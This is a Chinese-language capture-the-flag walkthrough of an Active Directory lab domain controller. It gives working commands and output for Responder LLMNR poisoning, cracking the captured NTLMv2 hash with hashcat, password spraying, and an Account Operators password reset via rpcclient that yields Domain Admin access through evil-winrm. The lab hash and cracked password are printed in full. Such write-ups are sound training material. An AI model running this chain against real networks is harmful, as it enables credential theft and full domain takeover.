难度:Medium
kali:192.168.56.104
靶机:192.168.56.126
root@kali2 [~] ➜ arp-scan -l [15:58:03] Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.1.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 78:60:5b:04:b4:8c TP-LINK TECHNOLOGIES CO.,LTD.
192.168.1.102 08:00:27:6a:d2:74 PCS Systemtechnik GmbH端口扫描
root@kali2 [~/Desktop/dc03] ➜ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.102 -oG ports.txt [15:58:36] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 15:58 CST
Nmap scan report for 192.168.1.102
Host is up (0.00036s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49674/tcp open unknown
49715/tcp open unknown
49772/tcp open unknownroot@kali2 [~/Desktop/dc03] ➜ cat ports.txt | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',' [15:59:21] 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49674,49715,49772
root@kali2 [~/Desktop/dc03] ➜ nmap 192.168.1.102 -sV -A -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49674,49715,49772 [15:59:22] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 15:59 CST
Nmap scan report for 192.168.1.102
Host is up (0.0015s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-08 22:59:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49715/tcp open msrpc Microsoft Windows RPC
49772/tcp open msrpc Microsoft Windows RPC域名SOUPEDECODE.LOCAL
然后我就经过了一系列的枚举爆破,结果是一无所有…..
responder
过了好几天,重新打开这个靶机,我想到了之前做过的responder LLMNR欺骗实验,就随便一试,结果抓到了NTLM 哈希,说明开启了LLMNR
https://tao0845.github.io/posts/b774aeb/?highlight=llmnr
root@kali2 [~/Desktop] ➜ responder -I eth0 -wd
...
...
!] Error starting TCP server on port 80, check permissions or other servers running.
[*] [DHCP] Found DHCP server IP: 192.168.1.1, now waiting for incoming requests...
[*] [MDNS] Poisoned answer sent to 192.168.1.106 for name FileServer.local
[*] [LLMNR] Poisoned answer sent to fe80::c1b0:ce8d:8998:df5f for name FileServer
[*] [NBT-NS] Poisoned answer sent to 192.168.1.106 for name FILESERVER (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.1.106 for name FileServer
[*] [MDNS] Poisoned answer sent to 192.168.1.106 for name FileServer.local
[*] [MDNS] Poisoned answer sent to fe80::c1b0:ce8d:8998:df5f for name FileServer.local
[*] [LLMNR] Poisoned answer sent to fe80::c1b0:ce8d:8998:df5f for name FileServer
[*] [LLMNR] Poisoned answer sent to 192.168.1.106 for name FileServer
[*] [MDNS] Poisoned answer sent to fe80::c1b0:ce8d:8998:df5f for name FileServer.local
[SMB] NTLMv2-SSP Client : fe80::c1b0:ce8d:8998:df5f
[SMB] NTLMv2-SSP Username : soupedecode\xkate578
[SMB] NTLMv2-SSP Hash : xkate578::soupedecode:e5de4a041c0c5baf:1776C6B1BAFC80407A72C8F6224B5D46:010100000000000000FE943AF0ECDA014FA0C54BE4CDB8100000000002000800540057005800370001001E00570049004E002D004B00390056003200350030003700590053004A00490004003400570049004E002D004B00390056003200350030003700590053004A0049002E0054005700580037002E004C004F00430041004C000300140054005700580037002E004C004F00430041004C000500140054005700580037002E004C004F00430041004C000700080000FE943AF0ECDA010600040002000000080030003000000000000000000000000040000013318A47756763C1D6FA36FF24424AEC93E3E070AEDFFD1C6A19F37355FEB48D0A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C0065005300650072007600650072000000000000000000
[+] Exiting..用hashcat爆破
root@kali2 [~/Desktop/dc03] ➜ hashcat aaa /usr/share/wordlists/rockyou.txt --force -m 5600 [19:48:14]
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i7-12700H, 1142/2349 MB (512 MB allocatable), 1MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344394
* Bytes.....: 139921521
* Keyspace..: 14344387
* Runtime...: 1 sec
XKATE578::soupedecode:e5de4a041c0c5baf:1776c6b1bafc80407a72c8f6224b5d46:010100000000000000fe943af0ecda014fa0c54be4cdb8100000000002000800540057005800370001001e00570049004e002d004b00390056003200350030003700590053004a00490004003400570049004e002d004b00390056003200350030003700590053004a0049002e0054005700580037002e004c004f00430041004c000300140054005700580037002e004c004f00430041004c000500140054005700580037002e004c004f00430041004c000700080000fe943af0ecda010600040002000000080030003000000000000000000000000040000013318a47756763c1d6fa36ff24424aec93e3e070aedffd1c6a19f37355feb48d0a0010000000000000000000000000000000000009001e0063006900660073002f00460069006c0065005300650072007600650072000000000000000000:jesuschrist拿到密码jesuschrist,winrm登录不了,看一下smb
smb探测
root@kali2 [~/Desktop/dc03] ➜ smbmap -u XKATE578 -p jesuschrist -H 192.168.1.106 [19:53:24]
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.1.106:445 Name: 192.168.1.106 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
share READ, WRITE
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections root@kali2 [~/Desktop/dc03] ➜ smbclient -U 'XKATE578%jesuschrist' //192.168.1.106/share [19:54:06]
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Aug 10 15:19:10 2024
.. D 0 Thu Aug 1 13:38:08 2024
desktop.ini AHS 282 Thu Aug 1 13:38:08 2024
user.txt A 70 Thu Aug 1 13:39:25 2024
12942591 blocks of size 4096. 10832683 blocks available
smb: \> get user.txt
getting file \user.txt of size 70 as user.txt (4.3 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \> get desktop.ini
getting file \desktop.ini of size 282 as desktop.ini (18.4 KiloBytes/sec) (average 11.1 KiloBytes/sec)顺利拿到user flag和一个桌面配置文件
root@kali2 [~/Desktop/dc03] ➜ cat desktop.ini [19:56:10]
��
[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769
IconResource=%SystemRoot%\system32\imageres.dll,-183暂时不知道有什么用,继续信息搜集。
攻击尝试
root@kali2 [~/Desktop/dc03] ➜ lookupsid.py xkate578@192.168.1.106 [20:00:10]
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 192.168.1.106
[*] StringBinding ncacn_np:192.168.1.106[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
512: SOUPEDECODE\Domain Admins (SidTypeGroup)
...拿到一些用户名,处理一下数据
root@kali2 [~/Desktop/dc03] ➜ cat users.txt | grep -Eo "CODE\\\\\S*" | sed 's/CODE\\//' > users.txt 爆破一下
root@kali2 [~/Desktop/dc03] ➜ crackmapexec smb 192.168.1.106 -u users.txt -p users.txt --continue-on-success
SMB 192.168.1.106 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Enterprise STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Administrator STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Guest STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:krbtgt STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Domain STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Domain STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Domain STATUS_LOGON_FAILURE
...
...全是failure。
尝试as-rep
root@kali2 [~/Desktop/dc03] ➜ GetNPUsers.py -usersfile users.txt -no-pass -dc-ip 192.168.1.106 soupedecode.local/ 依然全是失败,没有没开预认证的用户,可能还得从XKATE578这个用户下手
ldap信息收集
尝试使用ldapdomaindump获取域内成员信息
root@kali2 [~/Desktop/dc03] ➜ python -m ldapdomaindump -u SOUPEDECODE.LOCAL\\XKATE578 -p 'jesuschrist' 192.168.1.107 [20:59:29]
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
发现这个用户是在Account Operators这个组里面,看一下这个组的权限
这个组的成员可以管理域用户和组账户,但是不能管理域管理员。
只能从其他成员下手。
找到一个比较特殊的成员``,他在Operators这个组里面
跟随一下,发现这个组是域管理员组的成员。如果能修改这个成员的密码,也就是拿到了域管理员权限。
提权
因为登录不了winrm,只能通过rpc协议来进行登录
https://cloud.tencent.com/developer/article/1850814
在这篇文章找到了rpcclient比较全的指令,尝试强制修改密码
roott@kali2 [~/Desktop/dc03] ➜ rpcclient -U "xkate578" 192.168.1.107 [21:21:18]
Password for [WORKGROUP\xkate578]:
rpcclient $> setuserinfo2 fbeth103 23 Passw0rd!
result: NT_STATUS_ACCESS_DENIED
result was NT_STATUS_ACCESS_DENIED???
去dc上发现原来这是个设置,靶机因为安全策略十几分钟后会锁定不准修改fbeth103密码,只能重新导入靶机了。
root@kali2 [~/Desktop/dc03] ➜ rpcclient -U "xkate578" 192.168.1.108 [21:29:15]
Password for [WORKGROUP\xkate578]:
rpcclient $> setuserinfo2 fbeth103 23 passw0rd!
rpcclient $> 这次应该修改成了。
root@kali2 [~/Desktop/dc03] ➜ evil-winrm -i 192.168.1.108 -u "fbeth103" -p passw0rd! [21:29:26]
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\fbeth103\Documents> whoami
soupedecode\fbeth103
*Evil-WinRM* PS C:\Users\fbeth103\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
soupedecode\fbeth103 S-1-5-21-2986980474-46765180-2505414164-1221
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Operators Group S-1-5-21-2986980474-46765180-2505414164-2165 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Domain Admins Group S-1-5-21-2986980474-46765180-2505414164-512 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Denied RODC Password Replication Group Alias S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288确实是域管理员组
*Evil-WinRM* PS C:\users\administrator\desktop> type root.txt
.*拿下。